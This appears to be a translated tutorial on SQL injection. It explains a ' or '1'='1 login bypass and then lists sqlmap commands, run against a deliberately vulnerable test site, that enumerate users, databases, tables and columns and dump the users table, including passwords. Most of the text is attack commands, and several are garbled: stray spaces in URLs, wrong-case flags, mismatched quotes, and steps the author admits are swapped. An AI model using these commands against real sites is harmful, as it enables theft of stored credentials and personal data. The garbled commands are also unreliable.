After learning this article, you can obtain the database data with sql injection vulnerability through sqlmap
preface:
The so-called SQL injection attack is that the attacker inserts the SQL command into the input field of the Web form or the query string requested by the page, and deceives the server to execute malicious SQL commands.
Database is a very important part of Web application environment. The SQL command is the interface between the front-end Web and the back-end database, so that data can be passed to and sent out of the Web application. These data need to be controlled to ensure that users can only get the information authorized to them. However, many Web sites use the parameters entered by users to dynamically generate SQL query requirements. Attackers can change the query attributes by entering their own SQL commands in the URL, table field, or other input fields, so as to deceive the application, so that they can have unrestricted access to the database.
This statement simply indicates that the user name and username are equal and the password and password are equal from the user table. Therefore, if the user sends a username of "admin" and a password of "12345", the SQL statement is created as follows:
SELECT * FROM user WHERE username='admin' AND password ='12345'
Then, if the user enters' or '1' = '1, the first quotation mark will terminate the input string, and the rest will be treated as an SQL statement. In the SQL statement, 1=1 is always true, which can bypass the registration mechanism.
SELECT * FROM user WHERE username='admin' AND password =''or '1'='1'.
I Test platform of vulnerability scanning tool AWVS: http://testphp.vulnweb.com
1.GET request method:
Find the function page with database interaction. Enter the test platform and enter the following website in the address bar: http://testphp.vulnweb.com/artists.php?artist=1 . Add a semicolon '' after the url parameter artist=1, and the database error prompt appears
Basically, it is judged that there is a database injection vulnerability on this page!!!!
II Using this injection point, use sqlmap syntax
1. according to the results, the GET parameter artist is vulnerable(artist can be injected)
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1
2. further test to see which users, add --users after the command line (note that there are spaces)
Found acuart'@'localhost users
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --users
3. Add a space --dbs to see which databases are available
Found two databases, acuart and information_schema
Article 1 view the current database sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs The second is to view the current user and the current database sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --current-user --current-db
4. Read the table information of data: add a space after the command line --tables -D "database name"
Get 8 tables of acuart
sqlmap -u "http://testphp. vulnweb. com/artists. php? Artist=1 "--tables -d" database name“
5. View the number of fields in this table (5 is different from 6. 5 is to view the data in the table and 6 is to view the fields in the table) (in fact, 5 and 6 are written backwards)
The data of the table is all the values of the field
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --count -T "users" -D "acuart"
6. View the fields in a table
There are 8 fields in the user table
sqlmap -u "http://testphp. vulnweb. com/artists. php? Artist=1 "--columns -t" table name "-D" database name“
7. read table data (non field) contents
All data in the field is table data. The following figure shows the password, telephone and other data in the user table
sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "users" -D "acuart"
8. other
read users From one record to one record in the table, this example reads records 2 to 4 sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -T "users" -D "acuart" --start 2 --stop 4 Read all field data of all tables in the database sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump-all -T "users" -D "acuart"